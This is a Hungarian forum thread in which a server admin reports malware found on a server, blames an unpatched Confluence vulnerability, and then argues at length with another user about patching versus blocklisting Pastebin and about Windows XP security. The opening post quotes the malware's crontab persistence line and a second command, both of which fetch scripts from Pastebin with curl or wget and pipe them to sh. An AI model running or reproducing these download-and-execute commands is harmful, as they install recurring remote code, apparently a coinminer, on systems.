Pastebin, mint rootkit store

Security-all

Egyik szerveremen találtam.

Beleírja magát a cron-ba: 

echo "*/15 * * * * (curl -fsSL https://pastebin.com/raw/HdjSc4JR||wget -q -O- https://pastebin.com/raw/HdjSc4JR)|sh" | crontab -

Majd ezt futtatva lehozza magát újra és újra: 

(curl -fsSL https://pastebin.com/raw/xmxHzu5P||wget -q -O- https://pastebin.com/raw/xmxHzu5P)|sed -e 's/\r//g'|sh

Letölt ezt-azt, futtat ezt-azt.

  • 1461 megtekintés

( ricsip v | 2019. 04. 13., szo – 15:38 )

Corporate helyeken a tűzfal/szekjuriti device blokkolja a pastebin-t úgy ahogy van.
--

"Pont úgy, ahogy a Windows 10 frissítések."

Bizony, pont úgy. A 2019. március 20-án közzétett (és javított) sebezhetőség kihasználásával jött be a tárgybeli malware/rootkit:
https://confluence.atlassian.com/doc/confluence-security-advisory-2019-…

Egyértelműen a frissítés hiánya okozta, amit nem végeztem el azonnal (vagy legkésőbb napokon belül) és akkor nem okozott volna most problémát.

"Amúgy, mi akadályoz meg abban, hogy a szervereden saját pastebin-szerű szolgáltatást csinálj?"

A Pastebin-hez annyi köze van, hogy éppen azt használja arra, hogy ezt a 4 kBájt mérető szkriptet tárolja, tárolhatná akárhol máshol is, akár ezen a portálon, akár a te lyukas gépeden. Megint sikerült beleszólnod olyan dologba, amihez nem értesz.

--
https://iotguru.live

Nem a Confluence frissítéseiről beszéltem, hanem a Windows 10 frissítéseiről.

Egyértelműen a frissítés hiánya okozta, amit nem végeztem el azonnal

Nem az okozta. Az okozta, hogy elhitted (és máig elhiszed), hogy elég időben megfrissíteni a rendszered és aztán teljes biztonságban van. Tehát, a biztonság hamis illúziójában ringattad magad. Aztán elfelejtetted időben megfrissíteni. Utóbbi az átka annak, ha az ember túlkényelmesíti magát és hozzászokik, hogy az operációs rendszer helyette (is) gondolkodik.

A Pastebines dolog onnan indult, hogy javasolták az oldal tiltását. Meg lennék lepve, ha ez lenne az első rootkit, ami Pastebint használ. Számos visszaélés és kártékony kód felkerült már oda. Nem véletlen erről szólt a legelső hozzászólás.

A gépem pedig nem nekem lyukas, hanem neked. Méghozzá azért, mert egységsugarú módon elhitted, hogy a lyukak száma a frissítésekkel nullára csökkenthető és más óvintézkedést eszed ágában nem volt tenni arra, hogy fűnek-fának ne legyen hozzáférése a szerveredhez.

A kérdés pedig továbbra is: Ha már saját Confluence-t üzemeltetsz, kidobva rengeteg pénzt egy bloated, jávában írt, hót lyukas szarra, mi akadályoz abban, hogy pastebin.com-hoz hasonló cuccot futtass a szervereden, miután a pastebin-t tiltólistára raktad?

"Nem a Confluence frissítéseiről beszéltem, hanem a Windows 10 frissítéseiről."

Mégis mi különbség van a kettő között, ha kiderül egy critical remote exploit, amit csak frissítéssel tudsz javítani? Semmi. Javítani kell frissítéssel.

"Nem az okozta. Az okozta, hogy elhitted (és máig elhiszed), hogy elég időben megfrissíteni a rendszered és aztán teljes biztonságban van."

De, az okozta.

"Méghozzá azért, mert egységsugarú módon elhitted, hogy a lyukak száma a frissítésekkel nullára csökkenthető és más óvintézkedést eszed ágában nem volt tenni arra, hogy fűnek-fának ne legyen hozzáférése a szerveredhez."

Nem csökkenthető nullára, de nullát a legjobban megközelíteni csak rendszeres frissítéssel tudsz és azzal, hogy ha publikus lesz egy komoly sebezhetőség, akkor _azonnal_ frissítesz. Erre épül minden más védelem.

"Ha már saját Confluence-t üzemeltetsz, kidobva rengeteg pénzt egy bloated, jávában írt, hót lyukas szarra"

Hót lyukas szar a Windows XP-d. :)

"mi akadályoz abban, hogy pastebin.com-hoz hasonló cuccot futtass a szervereden, miután a pastebin-t tiltólistára raktad?"

Az, hogy mások nem fognak az én weboldalamra tenni a hasznos szkripteket, hanem a Pastebin-re fogják tenni. Nem látom értelmét kiönteni a gyereket a fürdővízzel együtt.

Az a helyzet, hogy a frissítéssel valóban megoldom a biztonsági problémát, a különféle oldalak tiltólistára rakosgatásával pedig csak foltoznám a szitán a lyukakat, felesleges munkát adnék magamnak, de a biztonsági problémát nem oldanám meg. Ha például valamilyen hülye ötlettől vezérelve tiltottam volna a Pastebin-t, akkor ugyanez a malware lejött volna a z9ls.com oldalról. Vagy a több ezer egyéb feltört VPS oldalról. Vagy akár a frissítés nélküli Windows XP gépedről. A tiltással semmit nem oldok meg, csak magamat szopatom.

A frissítés viszont a gyökerénél oldja meg a problémát, teljesen mindegy, hogy hol van a szkript, nem tud bejutni a szerverre.

--
https://iotguru.live

Mégis mi különbség van a kettő között, ha kiderül egy critical remote exploit, amit csak frissítéssel tudsz javítani? Semmi. Javítani kell frissítéssel.

Az, hogy a Windows 10 frissítések számos esetben akadályozzák átmenetileg a felhasználók munkáját a telepítéssel és az újraindítgatással. Sőt akadályozták már a számítógép bootolhatatlanná tételével is. Ez például a Confluence-re valószínűleg nem igaz. :)

De, az okozta.

Szerintem pedig nem. Persze, ettől még gondolhatod másképp.

Nem csökkenthető nullára, de nullát a legjobban megközelíteni csak rendszeres frissítéssel tudsz

Nem "csak". Más kérdés, ha a frissítés az egyetlen kényelmes módja. Akkor csakazértis ebben az illúzióban fogod magad ringatni, hogy ne kelljen biztonságos szervert és hálózatot építened.

Hót lyukas szar a Windows XP-d. :)

Nem. A Windows XP egy mai napig jól működő, hatékony, stabil, robusztus operációs rendszer, 14 év beleölt munkával, melyből 8 év fejlesztés, 5 év csak hibajavítás. Utóbbi mellé bevehetjük a +5 év POSReady 2009 frissítéseket is. Úgy összesen 10 év maintenance. A Windows XP-t a frissítések hiányának ellenére lehet biztonságosan használni, de kár lenne szervert kliens géphez hasonlítani.

Az, hogy mások nem fognak az én weboldalamra tenni a hasznos szkripteket, hanem a Pastebin-re fogják tenni.

Akkor a Confluence-edet miért használják?

A tiltással semmit nem oldok meg, csak magamat szopatom.

Én ezt biztonságtudatos szerveradminisztrációnak és üzemeltetésnek hívom. Te szopatásnak.

Vagy a több ezer egyéb feltört VPS oldalról. Vagy akár a frissítés nélküli Windows XP gépedről.

Amit szintén nyugodtan tiltólistára rakhatsz. A frissítés nélküli Windows XP gépemről pedig biztosan nem kapsz ilyet, mert én (veled ellentétben) foglalkozom annyit a biztonsággal (értsd: szopatom™ magam annyit), hogy tiszta maradjon a gépem.

A frissítés viszont a gyökerénél oldja meg a problémát, teljesen mindegy, hogy hol van a szkript, nem tud bejutni a szerverre.

Kivéve, ha a sebezhetőséget előbb fedezik fel hackerék, mint valami menő™ white-hat biztonsági szupercsapat™.

Hogy magamat idézzem: Frissítésektől biztonságot remélni olyan, mint divatos ruhákat golyóálló mellénynek használni.

Ettől persze még te élhetsz így.

"Hogy magamat idézzem: Frissítésektől biztonságot remélni olyan, mint divatos ruhákat golyóálló mellénynek használni."

Tudod, a frissítés olyan, mint egy golyóálló üveg: mögötte mindegy, hogy mit viselsz, megfogja a golyót. Amit te csinálsz, az a kategória az, hogy majd a ruhád megfogja a golyót.

"A frissítés nélküli Windows XP gépemről pedig biztosan nem kapsz ilyet, mert én (veled ellentétben) foglalkozom annyit a biztonsággal (értsd: szopatom™ magam annyit), hogy tiszta maradjon a gépem."

Ez ellen például hogy védekezel?: https://www.cvedetails.com/cve/CVE-2017-8487/

--
https://iotguru.live

Tudod, a frissítés olyan, mint egy golyóálló üveg: mögötte mindegy, hogy mit viselsz, megfogja a golyót.

Nem fogja meg a golyót. Valójában a hót lyukacsos, golyóállónak hitt üvegen foltoz be nagyobb, tátongó lyukakat, amiket nem csak hackerék, de még a menő™ white-hat security huszárok is észrevettek.

Ez ellen például hogy védekezel?: https://www.cvedetails.com/cve/CVE-2017-8487/

Nagyon egyszerűen: Nem nyitom meg a specially crafted fájlt.

(Egyébként, ezt konkrétan javították POSReady 2009 javításokkal, tehát ha FUD paranoid lennék, áttérhetnék 32-bites XP-re és felrakhatnám. De ezt az opciót a kedvedért szándékosan nem vettem figyelembe.)

Honnan tudod, hogy specially crafted az oldal, amit használsz?

Honnan tudod, hogy például az általad múltkor belinkelt http://www.cellphonetaskforce.org oldalra nem tettek ártalmas kódot? Vagy bármelyik másikra, amit épp találtál az internet bugyraiban?

Honnan tudod, hogy én nem linkeltem neked egy olyan oldalt, amin tudom, hogy van a számodra veszélyes malware?

--
https://iotguru.live

Mondanám, hogy azért, amiért te biztos vagy abban, hogy a frissítéseid után nem leszel törhető, más, általad nem ismert, plusz új featureökkel bekerült, vagy egyéb, white-hatek által fel nem fedezett sebezhetőségeken keresztül.

A válaszom erre az, hogy: Nem vagyok biztos benne. Viszont a malware listákra jóval egyszerűbb felvenni egy kártékony oldalt, mint kijavítani egy sebezhetőséget, tehát a frissítéseknél ez biztos, hogy gyorsabban és hatékonyabban véd.

Ismeretlen és gyanús oldalakat VirusTotallal le szoktam scanneltetni, ahogy egyes fájlokat is. A böngészőmet pedig mit ad Isten: frissítem, mert van 5 folyamatosan frissülő böngésző is XP-re. Frissítetlen böngészővel pedig csak megbízható oldalakat látogatok.

Ezeket összekombinálva már sokkal nagyobb biztonságban vagyok, mintha hátradőlnék és orrba-szájba tapicskolnék, a frissítések adta "biztonság" hamis illúziójában. Emellett készítek hetente, vagy két hetente backupot, továbbá nagyjából havonta ellenőrzöm a gépet friss definíciós adatbázissal rendelkező offline víruskeresővel, slave módban. A tények magukért beszélnek. Eddig soha nem kaptam se (zsaroló)vírust, se trójait, se rootkitet. Ha érne is baj ezek után, nagy baj biztosan nem érhet.

Ezt kérlek szépen prevenciónak és elővigyázatosságnak hívják.

Tüneti kezelésnek azt hívják, amit épp te csináltál, hogy eső után köpönyeg alapon felrakod a frissítést a megtört rendszeredre, majd kézzel szarakodva irtod le a rootkitet. Mindeközben a rendszered biztonsága továbbra is kizárólag egyetlen rozoga pilléren imbolyog: a frissítéseken.

Alapvetően ez a dolog úgy néz ki, hogy ha kiderül egy biztonsági hiba, akkor

0, kockázatelemzés, hogy mennyire sürgősek a teendők
1, workaround alkalmazása, ha van és használható
2, frissítés alkalmazása, amint elérhető

Minden más védelem ezután jön vagy ezektől amúgy teljesen független. A szitán lyukakat foltozni nem megoldás.

--
https://iotguru.live

( dotnetlinux | 2019. 04. 13., szo – 17:04 )

De ki volt az aki először lefuttatta a curl/wget-et. És miért?

Update: bocsánat, megnéztem az egyik képet (jpeg?), amit töltöget a rootkit és a nod32 megfogta, ezzel: https://www.virusradar.com/en/Linux_CoinMiner/detail. Szóval ez lehetett egy kép is, ami be foglt ágyazva valami hirdetésbe... grrrr.

Ehhez kapcsolódva: többször észrevettem, hogy emberek szándékosan, félrefordított kifejezéseket használnak, mintha ki akarnának tünni, hogy na, ezt ők alkották vagy csak simán poénnak szánják, nem tudom, de elég zavaró szokott lenni.
Ilyen pl a "broken" (rossz, hibás) ill "breaks" (elrontja) helyett az eltört, eltöri, törte...
Persze lehet én komplikálom túl és tényleg csak simán az van amit te is írsz, hogy nem tudják mit jelent és a google ezt dobja ki nekik ;-)